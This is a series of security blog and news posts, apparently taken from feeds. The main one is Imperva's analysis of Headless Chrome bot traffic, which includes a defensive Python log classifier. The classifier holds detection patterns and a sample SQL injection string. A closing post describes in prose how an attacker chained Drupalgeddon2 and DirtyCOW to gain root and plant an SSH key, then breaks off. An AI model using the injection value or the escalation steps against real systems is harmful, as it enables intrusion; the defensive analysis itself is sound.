However, nowadays, Chrome occupies the top of the “attackers’ podium,” with half of the malicious traffic divided evenly between execution in headless and non-headless mode.

Taking a closer look at malicious traffic, however, I found that there are no specific trends indicating a preference among attackers for Headless Chrome to exploit vulnerabilities, inject SQL or carry out cross-site scripting attacks (XSS). That said, occasional spikes show attempts at targeting specific sites by using vulnerability scanners, or attempts to exploit newly released vulnerabilities using the “spray and pray” technique.

Using a web browser for vulnerability scanning is crafty, but not a new approach, as it can help to bypass some validation mechanisms based on validation of the legitimacy of the client.

WAF events generated by Headless Chrome

Analyzing traffic from the last year, I didn’t find any DDoS attacks performed from a botnet based on Headless Chrome, nothing similar to the Headless Android Botnet that was discovered two years ago and has since all but vanished.

Usage of automated browsers in general, and Headless Chrome in particular, for DDoS, is not common practice. The reason for this is the low request rate to the server that browsers can generate. As Chrome receives the response from the server, evaluates it and only then performs the next request, its rate is very low in comparison to a simple script that floods with many requests and doesn’t “care” about the responses.

Having said that, we observe more than 10K unique IP addresses daily performing scraping, sniping, carding, blackhat SEO and other types of malicious activity where JavaScript evaluation is necessary to perform the attack. The distribution among the countries performing these malicious activities is presented in the chart below; 7% of the traffic comes from proxies or VPNs used to hide the origin of the attack.

Geographical distribution of malicious Headless Chrome traffic

But what about legitimate services?

Headless Chrome isn’t only used by attackers but also by legitimate services. We observe dozens of legitimate well-known web tools that use it to access websites.

  • Search engines use it to render the page, generate dynamic content and index data from single page web applications.
  • SEO tools use it to analyze your website and help promote it better.
  • Monitoring tools use Headless Chrome to measure performance and JavaScript execution time of web applications.
  • Online testing tools render pages and compare it to previous versions to track regression or distortion in the user interface.

Ok, so how do we make sure we’re protected?

At this point, you’re probably asking yourself whether or not to block Headless Chrome or any other automated browsers.

The answer to this question is “yes… and no.”

Using Headless Chrome by itself is not malicious, and as stated earlier, there are legitimate scenarios and services that use this functionality to access websites. Whitelisting all legitimate services is tough work, as it requires constantly mapping and maintaining the lists of such services and their IPs.

The decision to block Headless Chrome requests or not should be based on the intent and behavior of each IP and session individually.

Unless the payload itself is malicious (which is strong evidence of malicious activity), it is better to pass some requests to the website, analyze the behavior and only then decide whether to block or not.

IP reputation and correlation, sophisticated heuristics, and machine learning algorithms can be used to make a deliberate decision, which will give better long-term results than aggressive blocking, at least in most cases.

For Imperva Incapsula users, a set of IncapRules can be implemented to block Headless Chrome from accessing your website, ranging from a simple rule based on client classification to sophisticated rules that include rates, tags, and reputation.
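To show what a behaviour-based decision looks like in practice, here is an added example that is not Imperva's code and not an IncapRule: it parses a few constructed access-log lines, identifies Headless Chrome by its user agent, and decides per IP whether to block, challenge, or allow and monitor. The payload signatures, rate threshold and log lines are all constructed for the illustration.

```python
"""Added example (not Imperva's code or IncapRules): per-IP decisions for Headless
Chrome traffic based on behaviour rather than on the user agent alone.
Log lines, thresholds and signatures are constructed for illustration."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A minimal, hypothetical set of request signatures that a WAF treats as
# strong evidence of malicious intent, whatever the client is.
MALICIOUS_PAYLOAD = re.compile(
    r"(?:'\s*or\s*\d+\s*=\s*\d+|union\s+select|<script\b|\.\./)", re.IGNORECASE
)
RATE_WINDOW_SECONDS = 10
RATE_LIMIT = 5  # more than this many requests in the window from one IP is "bursty"


def parse_log(lines):
    records = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        records.append(rec)
    return records


def is_headless_chrome(user_agent):
    # Headless Chrome announces itself as "HeadlessChrome/<version>" unless the UA is overridden.
    return "HeadlessChrome/" in user_agent


def max_requests_in_window(timestamps):
    """Largest number of requests from one IP inside any RATE_WINDOW_SECONDS window."""
    ts = sorted(timestamps)
    best, start = 0, 0
    for end in range(len(ts)):
        while (ts[end] - ts[start]).total_seconds() > RATE_WINDOW_SECONDS:
            start += 1
        best = max(best, end - start + 1)
    return best


def decide(lines):
    """Return {ip: decision}; intent (payload) outranks identity (headless or not)."""
    by_ip = defaultdict(list)
    for rec in parse_log(lines):
        by_ip[rec["ip"]].append(rec)
    decisions = {}
    for ip, recs in by_ip.items():
        headless = any(is_headless_chrome(r["ua"]) for r in recs)
        if any(MALICIOUS_PAYLOAD.search(unquote(r["path"])) for r in recs):
            decisions[ip] = "block"               # malicious payload, regardless of client
        elif headless and max_requests_in_window(r["ts"] for r in recs) > RATE_LIMIT:
            decisions[ip] = "challenge"           # automated and bursty: verify before serving more
        elif headless:
            decisions[ip] = "allow_and_monitor"   # automated but so far well behaved
        else:
            decisions[ip] = "allow"
    return decisions


# Constructed sample traffic (documentation IP ranges, no real clients).
HEADLESS_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
               "HeadlessChrome/70.0.3538.77 Safari/537.36")
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/70.0.3538.77 Safari/537.36")


def _line(ip, second, path, ua, status=200):
    return (f'{ip} - - [10/Dec/2018:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')


SAMPLE_LOG = (
    [_line("203.0.113.5", 0, "/", HEADLESS_UA), _line("203.0.113.5", 30, "/about", HEADLESS_UA)]
    + [_line("203.0.113.6", s, f"/item/{s}", HEADLESS_UA) for s in range(6)]
    + [_line("203.0.113.7", 3, "/products?id=1%27%20OR%201%3D1", HEADLESS_UA)]
    + [_line("198.51.100.9", 7, "/products?id=1", CHROME_UA)]
)

if __name__ == "__main__":
    for ip, decision in decide(SAMPLE_LOG).items():
        print(ip, decision)
```

The ordering of the checks encodes the post's advice: a malicious payload is blocked whether or not the client is headless, a headless client that scrapes in a burst is challenged rather than silently dropped, and a headless client that behaves like a slow, ordinary visitor is let through and watched, which keeps legitimate monitoring and SEO tools working.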

The post Headless Chrome: DevOps Love It, So Do Hackers, Here’s Why appeared first on Blog.

Cyber-criminals invent a new “no talk” scam to trick you

Telephone scams are nothing new. Almost all of us will have taken a call from someone claiming to be from our bank. Or a helpful representative of Microsoft who needs to help us fix our computers.

And because these scams are so common, we’ve got pretty good at spotting them. Which means we are also much less likely to fall victim to them.

Unfortunately, scammers have found other profitable phone scams – and they don’t even need to talk to you.

“Guess the password” scams

Almost every big business – including banks – now relies on call centres to provide help and support to customers. In general these services work quite well, but they can be compromised by determined criminals.

Often these call centres verify customer identity with relatively basic questions. What town were you born in? What is your mother’s maiden name? In the age of Facebook and over-sharing on social networks, this information is surprisingly easy to come by.

The scammer simply calls your bank, answers the relevant security questions and they can take full control of your account. As far as the bank knows, the caller is you.

Other phone services are protected by a 4-digit PIN number. The operator asks for the number – or some specific digits – before permitting access to the account.

The problem with PIN numbers is that there are just 10,000 possible combinations. Given enough time, criminals can simply keep calling in and guessing new combinations until they get the right one.

Both of these attacks work well – and neither requires you to speak to the hacker.

Smartphone scams

Hackers are also turning to text-only attacks as a way to trick unsuspecting victims into handing over sensitive personal information like passwords. Scammers will often send a text message pretending to be from your bank.

These messages may ask you to text back to confirm your identity. They will ask for a password or PIN for instance – details they can then use to log into your account.

Other messages may contain a link. Tap the link and you land on a website that looks just like your bank’s. When you try to log in, nothing happens – as far as you can tell. But in reality, the scammers have managed to steal your user name, password and other important information that can be used on the real bank site.

By the time you realise, scammers may have already emptied your account. And again, they’ve done it using your phone – but without ever speaking to you.

Protect yourself against no-talk scams

Protecting yourself against no-talk scams is a three-step process. First you must choose security passphrases that are not easily guessed. Select security questions like “What was the name of your first teacher at school?” for instance.

Second, realise that your bank will never send you an SMS asking for your password or other details. And they will never send a link in their messages either – they will simply ask you to visit the website. It is then down to you to open the browser or app manually.

Third, make sure that you have anti-malware like Panda Security installed on your smartphone (free trial here). This will help prevent your phone from being hijacked by malware. And a premium VPN will protect you from fake websites and dodgy links.

No-talk scams are a significant risk to everyone – including you. But they can be avoided using these tips.

For more help and advice about staying safe online, check out the Panda Security blog.


The post Cyber-criminals invent a new “no talk” scam to trick you appeared first on Panda Security Mediacenter.

Why compliance is never enough

Organizations are well aware of the security risks inherent in our hyper-connected world. However, many are making the mistake of focusing their attention on being compliant rather than on ensuring that their security strategy is effective and efficient. As the threat landscape continues to evolve this type of compliance-driven, checkbox mentality is setting many organizations up for a potentially disastrous fall (or breach). Being in compliance does not guarantee that a company has a comprehensive … More

The post Why compliance is never enough appeared first on Help Net Security.

Take cybersecurity into your own hands: Don’t rely on tech giants

Google doesn’t want you to have to think about cybersecurity at all, similar to how we think about breathing, which sounds like a great idea. However, in all of my years in cyber security, from the Israeli Defence Forces’ Intelligence Corps Unit to my years at the government’s National Cyber Bureau – where I worked with one of the most attacked organizations in the world, the Israel Electric Corporation – I’ve learned that trusting solely … More

The post Take cybersecurity into your own hands: Don’t rely on tech giants appeared first on Help Net Security.

Cybersecurity 2019: Predictions you can’t ignore

As we move forward to 2019, expect credit card and payment information theft to continue to rise. Yes, this isn’t a major surprise; however, if organizations can better address the reasons for the rise in cybercrime, they will be better prepared. Bolder cyberattacks against digital businesses The good news: advanced security technologies are constantly being brought to market. The not-so-good news: threat actors are not letting that get in the way; witness more intensified and … More

The post Cybersecurity 2019: Predictions you can’t ignore appeared first on Help Net Security.

Key reasons holding back MFA adoption by mainframe customers

While 64 per cent of mainframers are aware that multi-factor authentication (MFA) is now available to control access to mainframe applications, only 20 per cent acknowledge their organization is already using it or plans to do so, according to Macro 4. Concerns about disrupting applications, lack of mainframe and security skills and resistance from end users are some of the issues holding back adoption. “With data protection and security a major priority among most enterprises, … More

The post Key reasons holding back MFA adoption by mainframe customers appeared first on Help Net Security.

Uber fined $1.1 million by UK and Dutch regulators over 2016 data breach

British and Dutch data protection regulators Tuesday hit the ride-sharing company Uber with a total fine of $1,170,892 (~ 1.1 million) for failing to protect its customers’ personal information during a 2016 cyber attack involving millions of users. Late last year, Uber unveiled that the company had suffered a massive data breach in October 2016, exposing names, email addresses and phone

8 Popular Android Apps Caught Up In Million-Dollar Ad Fraud Scheme

Cheetah Mobile—a prominent Chinese app company, known for its popular utility apps like Clean Master and Battery Doctor—and one of its subsidiaries, Kika Tech, have allegedly been caught up in an Android ad fraud scheme that stole millions of dollars from advertisers. According to app analytics firm Kochava, 7 Android apps developed by Cheetah Mobile and 1 from Kika Tech with a total 2 billion

Mirai Bot Targets Linux Servers Through Hadoop Vulnerability

Mirai Bot, best known for exploiting IoT devices, has recently been attacking Linux servers through the Hadoop YARN vulnerability. Reportedly, many

Mirai Bot Targets Linux Servers Through Hadoop Vulnerability on Latest Hacking News.

Why you shouldn’t be worried about UPnP port masking

Last May, security firm Imperva wrote a blog post discussing a new proof of concept for bypassing DDoS mitigation after discovering reflected network protocols appearing on non-standard network ports. Imperva was able to replicate the same behavior using a technique called UPnP Port Masking, which uses the Universal Plug and Play (UPnP) Protocol to alter the source port of commonly abused network protocols in DDoS attacks. Multiple news outlets picked up on Imperva’s research and … More

The post Why you shouldn’t be worried about UPnP port masking appeared first on Help Net Security.

ATM attackers strike again: Are you at risk?

The United States National ATM Council recently released information about a series of ATM attacks using rogue network devices. The criminals opened the upper half of the ATM and installed the device, most likely into the Ethernet switch. The device then intercepted the ATM’s network traffic and changed the bank’s “withdraw denied” response to “withdraw approved,” presumably only for the criminals’ cards. For many readers, the attacks’ success may be surprising. However, IBM X-Force Red … More

The post ATM attackers strike again: Are you at risk? appeared first on Help Net Security.

The current state of cybersecurity in the connected hospital

Abbott and The Chertoff Group released a white paper that shares key findings from a recent study of 300 physicians and 100 hospital administrators on cybersecurity challenges in the hospital environment. Results found that while physicians and hospital administrators view cybersecurity as a priority, the majority of them feel underprepared to combat cyber risks in the connected hospital. “Cybersecurity is a shared responsibility across all of us working in today’s healthcare system,” said Chris Tyberg, … More

The post The current state of cybersecurity in the connected hospital appeared first on Help Net Security.

How to help maintain security compliance

This is the last post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Your employees need to access, generate, and share organizational information ranging from extremely confidential to informal; you must ensure that all information and the movement of that information comply with industry standards without inhibiting workflow. Microsoft 365 security solutions can help you know what's happening with your data, set permissions and classifications, and discover and help prevent leaks.

How can I make it easier to manage compliance processes?

To better manage compliance processes, the first thing you'll want to do is distribute the work out to compliance specialists across your organization. The Microsoft 365 Security & Compliance Center (Figure 1) makes this easy by providing a central location to assign people to specific compliance tasks, such as data loss prevention, eDiscovery, and data governance.

Figure 1: The Microsoft 365 Security & Compliance Center Dashboard.

Next, you'll need to decide on the policies and data classifications that will allow you to take actions on data. To streamline this compliance task, Microsoft Advanced Data Governance offers automatic data classification and proactive policy recommendations, such as retention and deletion policies, throughout the data lifecycle. You can enable default system alerts to identify data governance risks, for example, detecting an employee deleting a large volume of files. You can also create custom alerts by specifying alert-matching conditions, thresholds, or other activities that require admin attention.

How do I assess data protection controls in an ever-changing compliance landscape?

The Microsoft Security Compliance Manager (Figure 2) provides tools to proactively manage evolving data privacy regulations. You can perform ongoing risk assessments on security, compliance, and privacy controls across 11 assessments, including these standards:

  • ISO 27001
  • ISO 27018
  • NIST 800-53
  • NIST CSF
  • CSA CCM

Plus, regional standards and regulations, including:

  • GDPR

As well as industry standards and regulations, such as:

  • HIPAA/HITECH
  • FFIEC
  • NIST 800-171
  • FedRAMP Moderate
  • FedRAMP High

Additionally, Compliance Manager provides step-by-step guidance on how to implement controls to enhance your compliance posture and keeps you updated on the current compliance landscape. In addition, built-in collaboration tools help you assign, track, and record compliance activities to prepare for internal or external audits.

Figure 2: Compliance Manager provides tools to proactively manage evolving data privacy regulations.

How can I protect my data no matter where it lives or travels?

With employees, partners, and other users sharing your data over cloud services, mobile devices, and apps, you need solutions that understand what data is sensitive and automatically protect and govern that data. The unified labeling experience for Microsoft 365 in the Security & Compliance Center provides a tool that allows you to configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location (Figure 3). You can create and customize labels that define the sensitivity of the data: for example, a label of General means the file doesn't contain sensitive information, while Highly Confidential means the file contains very sensitive information. For each label, you can configure protection settings, such as adding encryption and access restrictions, or adding visual markings such as watermarks or headers/footers. To support data governance compliance, you can set policies for data retention, deletion, and disposition, and then automatically apply or publish these labels to users.

Figure 3: Configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location.

There are over 85 built-in sensitive information types that you can use to automatically detect common sensitive data types that may be subject to compliance requirements, such as credit card information, bank account information, passport IDs, and other personal data types. You can also create your own custom sensitive information types (such as employee ID numbers) or upload your own dictionary of terms that you want to automatically detect in documents and emails.

How can I help protect privileged accounts from compromise?

Controlling privileged access can reduce the risk of data compromise and help meet compliance obligations regarding access to sensitive data. Privileged access management (PAM) in Office 365 (Figure 4), available in the Microsoft 365 Admin Center, allows you to enforce zero standing access for your privileged administrative accounts. Zero standing access means users don't have privileges by default. When permissions are provided, it's at the bare minimum, with just enough access to perform the specific task. Users who need to perform a high-risk task must request permissions for access, and once received, all activities are logged and auditable. It's the same principle that defines how Microsoft gives access to its datacenters, and it reduces the likelihood that a bad actor can gain access to your privileged accounts.

Figure 4: Privileged access management allows you to enforce zero standing access for your privileged administrative accounts.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started with FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Maintain compliance with controls and visibility that adhere to global standards. You can find additional security resources on Microsoft.com.

Coming Soon! Stay tuned for our new series: Top 10 actions you can take with Microsoft 365 Security.


The post How to help maintain security compliance appeared first on Microsoft Secure.

GDPR’s impact: The first six months

GDPR is now six months old – it’s time to take an assessment of the regulation’s impact so far. At first blush it would appear very little has changed. There are no well-publicized actions being taken against offenders. No large fines levied. So does this mean it’s yet another regulation that will be ignored? Actually nothing could be farther from the truth. The day GDPR came into law complaints were filed by data subjects against … More

The post GDPR’s impact: The first six months appeared first on Help Net Security.

Are we chasing the wrong zero days?

Zero days became part of mainstream security after the world found out that Stuxnet malware was used to inflict physical damage on an Iranian nuclear facility. After the revelation, organizations focused efforts on closing unknown pathways into networks and on detecting unidentified cyber weapons and malware. A number of cybersecurity startups have even ridden the “zero day” wave into unicornville. Stuxnet’s ability to halt operations forced critical infrastructure operators to think about how they could fall … More

The post Are we chasing the wrong zero days? appeared first on Help Net Security.

For recent big data software vulnerabilities, botnets and coin mining are just the beginning

The phrase “with great power comes great responsibility” was excellent advice when Ben Parker said it to his nephew Peter, aka Spiderman. It is even more applicable to any organization using open source software to manage their big data analysis. This is especially true since, in 2018, significant vulnerabilities were identified and disclosed for both Hadoop and Spark, allowing unauthenticated remote code execution via their REST APIs. Many enterprises have adopted big data processing components … More

The post For recent big data software vulnerabilities, botnets and coin mining are just the beginning appeared first on Help Net Security.

Internal negligence to blame for most data breaches involving personal health information

Your personal identity may fall at the mercy of attackers on many websites, but when it comes to health data breaches, hospitals, doctors’ offices and even insurance companies are oftentimes the culprits. Internal dangers New research from Michigan State University and Johns Hopkins University found that more than half of the recent personal health information, or PHI, data breaches were because of internal issues with medical providers – not because of hackers or external parties. … More

The post Internal negligence to blame for most data breaches involving personal health information appeared first on Help Net Security.

McAfee Blogs: 8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance on and agility with our mobile devices increase, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured Wi-Fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public Wi-Fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL, its design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to, such as advertisers and website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!


The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.




MacOS Penetration Test Reveals Three Zero-Day Vulnerabilities

Recently, Dropbox undertook a pen test to highlight potential vulnerabilities in Mac OS. Syndis, a cybersecurity firm, was engaged

MacOS Penetration Test Reveals Three Zero-Day Vulnerabilities on Latest Hacking News.

WeLiveSecurity: Good deal hunting: Staying safe on Black Friday

As the unofficial beginning of the holiday shopping season catches us up in the frenetic hunt for all those fantastic bargains, the shopping bonanza presents a host of risks to your online safety. Here are a few tips for going on a shopping spree and staying safe

The post Good deal hunting: Staying safe on Black Friday appeared first on WeLiveSecurity




Don’t accept risk with a pocket veto

We who live risk management know there are four responses when confronted with a credible risk to our organizations. We can treat the risk to reduce it. We can avoid the risk by altering our organization’s behavior. We can transfer the risk with insurance or outsourcing, though the transfer is rarely complete. Lastly, we can accept risk and hope for the best. Let’s get this out of the way first: no security professional wants to … More

The post Don’t accept risk with a pocket veto appeared first on Help Net Security.

Losses from online payment fraud to reach $48 billion annually

A new study from Juniper Research has found that annual online payment fraud losses from eCommerce, airline ticketing, money transfer and banking services, will reach $48 billion by 2023; up from the $22 billion in losses projected for 2018. Juniper’s new research, Online Payment Fraud: Emerging Threats, Segment Analysis & Market Forecasts 2018-2023, claimed that a critical driver behind these losses will be the continued high level of data breaches resulting in the theft of … More

The post Losses from online payment fraud to reach $48 billion annually appeared first on Help Net Security.

Vision Direct Deals With Customer Data Leak

Vision Direct, the UK’s biggest online retailer of contact lenses, has recently hit the headlines for

Vision Direct Deals With Customer Data Leak on Latest Hacking News.

UK Infrastructure Allocates £1.9 Billion For Cyber Security Boost

Members of Parliament in the UK have recently pointed out the country’s lack of leadership in the cybersecurity domain. Unfortunately,

UK Infrastructure Allocates £1.9 Billion For Cyber Security Boost on Latest Hacking News.

Facebook, Instagram, and WhatsApp Suffer a Major Outage

Days before Thanksgiving, three of the most popular social networking tools in the United States suffered a major outage. The blackout became noticeable on Tuesday morning as hundreds of users reported that they were unable to access Facebook and Instagram. Many users shared that they were experiencing difficulties with other Facebook-owned apps such as the instant messaging service WhatsApp. The hashtag #FacebookDown immediately became a trending topic on the rival social network Twitter. Most of the affected users received the following error messages when they tried to access some of the Facebook services: “service unavailable” and “sorry, something went wrong. We’re working on it, and we’ll get it fixed as soon as we can.”

Almost immediately, Facebook acknowledged the issue through the company’s Twitter profile. A tweet from Facebook’s official Twitter account said that they were aware some people were experiencing difficulties accessing the Facebook family of apps, and confirmed that they were working to resolve the issue as soon as possible. Mark Zuckerberg’s communications team gave the same statement to ABC News a few hours after the outage was acknowledged on Twitter, confirming the issue had not yet been resolved. It is currently unknown whether hackers are behind the outage or it is an internal issue.

Who was affected by the Facebook outage?

The outage affected users living on the East Coast of the United States as well as people residing in the United Kingdom, Germany, Italy, Bulgaria, Portugal and the majority of Eastern Europe. In South America, Brazil, Argentina, Venezuela, and Colombia were also affected.

What caused the Facebook outage?

Facebook has not yet identified the source of the problem. Currently, no evidence confirms the outage is a result of a data breach or a cyber-attack.

How many people were affected?

There isn’t an official number of people who have been affected. However, Facebook apps are used by billions of people from all over the world, and even small glitches could impact hundreds of millions of people.

Facebook is going through tough times, and this is starting to show on the stock market: Facebook stock continues to dip, and the outage won’t help the company avoid posting a three-month losing streak. This outage is also the company’s second this month. According to Mark Zuckerberg’s communications team, the blackout a couple of weeks ago was the result of a routine test that went wrong. Facebook is currently unable to confirm whether the incidents are related.

If you are reading this article and you are still unable to access Facebook or Instagram, it is very likely that Facebook is still investigating the issue and working on a resolution. You can see the status of this issue on Facebook for Developers here.


The post Facebook, Instagram, and WhatsApp Suffer a Major Outage appeared first on Panda Security Mediacenter.

Conficker: A 10-year retrospective on a legendary worm

This November marked the 10-year anniversary of Conficker, a fast-spreading worm targeting Microsoft systems that went on to claim one of the highest levels of infection in history. Millions of computers were eventually infected by the worm, including hospitals across Europe as well as ordinary consumers. Looking back to my time helping to defeat the worm, however, it is apparent that the outbreak also helped to elevate the security industry and shape many of the … More

The post Conficker: A 10-year retrospective on a legendary worm appeared first on Help Net Security.

The holiday season and cybercrime: 8 ways to protect yourself

The holiday season has become an unbridled online spending extravaganza, and threat actors have taken notice. For shoppers, what starts out as an attempt to fulfill their holiday shopping checklist for pennies on the dollar can turn into a financial nightmare. For brands, what begins as an event that significantly boosts sales can turn into a security fiasco that erodes the trust between them and their customers and prospects. Cyber Monday 2017 was the largest … More

The post The holiday season and cybercrime: 8 ways to protect yourself appeared first on Help Net Security.

Should government officials complete basic cyber security training?

Venafi announced the results of a survey of 515 IT security professionals’ views on the cyber security literacy of government officials. The survey was conducted August 4-9, 2018, at the Black Hat conference in Las Vegas. According to the survey, eighty-eight percent of respondents believe all government officials should be required to complete a basic cyber security training course. In addition, sixty-six percent believe governments should not be able to force technology companies to grant … More

The post Should government officials complete basic cyber security training? appeared first on Help Net Security.

The state of BYOD and mobile device security

Bitglass has released its 2018 BYOD Security Report. The analysis is based on a survey of nearly 400 enterprise IT experts who revealed the state of BYOD and mobile device security in their organizations. According to the study, 85 percent of organizations are embracing BYOD. Interestingly, many organizations are even allowing contractors, partners, customers, and suppliers to access corporate data on their personal devices. Amidst this BYOD frenzy, over half of the survey’s respondents believe … More

The post The state of BYOD and mobile device security appeared first on Help Net Security.

Privacy laws do not understand human error

In a world of increasingly punitive regulations like GDPR, the combination of unstructured data and human error represents one of the greatest risks an organization faces. Understanding the differences between unstructured and structured data – and the different approaches needed to secure it – is critical to achieve compliance with the many data privacy regulations that businesses in the U.S. now face. Structured data is comprised of individual elements of information organized to be accessible, … More

The post Privacy laws do not understand human error appeared first on Help Net Security.

66.1% of vulnerabilities published through Q3 2018 have a documented solution

There have been 16,172 vulnerabilities disclosed through October 29th, which is a 7% decrease from the record high reported last year at this time. The 16,172 vulnerabilities cataloged through Q3 2018 by Risk Based Security’s research team eclipsed the total covered by the CVE and National Vulnerability Database (NVD) by over 4,800. It’s also worth noting that NVD is still significantly behind in vulnerability scoring and creating the automation component. Vulnerabilities with a CVSSv2 score … More

The post 66.1% of vulnerabilities published through Q3 2018 have a documented solution appeared first on Help Net Security.

Only 14% have complete organizational awareness of IoT threats

86 percent of IT and security decision makers across the globe believe their organization needs to improve its awareness of IoT threats, according to Trend Micro. This significant lack of knowledge accompanies rising threat levels and security challenges related to connected devices, which leaves organizations at great risk. The poll of 1,150 IT and security leaders reveals a worrying lack of cybersecurity maturity in many organizations around the world as they deploy IoT projects to … More

The post Only 14% have complete organizational awareness of IoT threats appeared first on Help Net Security.

DirtyCOW Bug Drives Attackers to A Backdoor in Vulnerable Drupal Web Servers

In this post we’ll unpack a short — but no less serious — attack that affected some Linux-based systems on October 31. Throughout the campaign, the attacker used a chain of vulnerabilities, including the infamous Drupalgeddon2 and DirtyCOW, together with system misconfigurations to persistently infect vulnerable Drupal web servers and take over user machines.

In the past, remote code execution (RCE) attacks on web servers were usually one-off security events – attackers would run their malicious code, and that was it. If the process was detected and terminated, or if the administrator restarted the web server, the attack would stop.

Increasingly, attackers are opting for persistent attacks. Persistence means that the attacker has a technique to easily re-infect a vulnerable server if the process is terminated or after a server restart, or to run additional malicious code. Persistence is achieved through different techniques and usually depends on the type of operating system.

Exploiting SSH in Linux

In the case of Linux-based systems, one of the favorite techniques used by attackers is opening a communication channel through SSH and transmitting malicious commands. This technique assumes that an SSH service is installed on the target system. But what happens if it isn’t? Well, then the attacker would somehow need to install it themselves.

In our case, the attack surface was the web application. This means that the attacker’s code was running under the user and permissions of the web application. Usually, the web server user (e.g. nobody, www-data etc.) has minimal permissions and can’t install new services. What if the attacker could change their user context and get sufficient permissions? What if the attacker changed the user to ‘root’? This will certainly help…

First, the attacker builds a word list by locating all of Drupal’s settings files and extracting any line with the word “pass” in it.

This technique can be quite useful as many administrators leave ‘root’ as the default user to connect from the web application to the database.

Then, armed with a potential list of passwords, the attacker tries to use the operating system command ‘su root’ to change the user to root.

If the attacker succeeds in changing the user, they can proceed to download the secondary payload ‘sshdstuff’ and execute it (more details below).

If the administrator was careful and didn’t leave root passwords in the configuration files, this technique fails, and the attacker tries to exploit the DirtyCOW bug to escalate their privileges to root. The attacker downloads three different implementations of DirtyCOW and runs them one after the other. One of the implementations is downloaded in its raw form (a C source code file) and is compiled at runtime. Surprisingly, one of the implementations of this two-year-old bug has a zero detection rate on VirusTotal.

Finally, once the attacker has switched to the root user and has permission to install new services, they install SSH, configure it and add their key to the service’s list of authorized keys. Now, as long as the machine is up and running, the attacker can remotely transmit any command as the user root – game over.

Mitigation suggestions

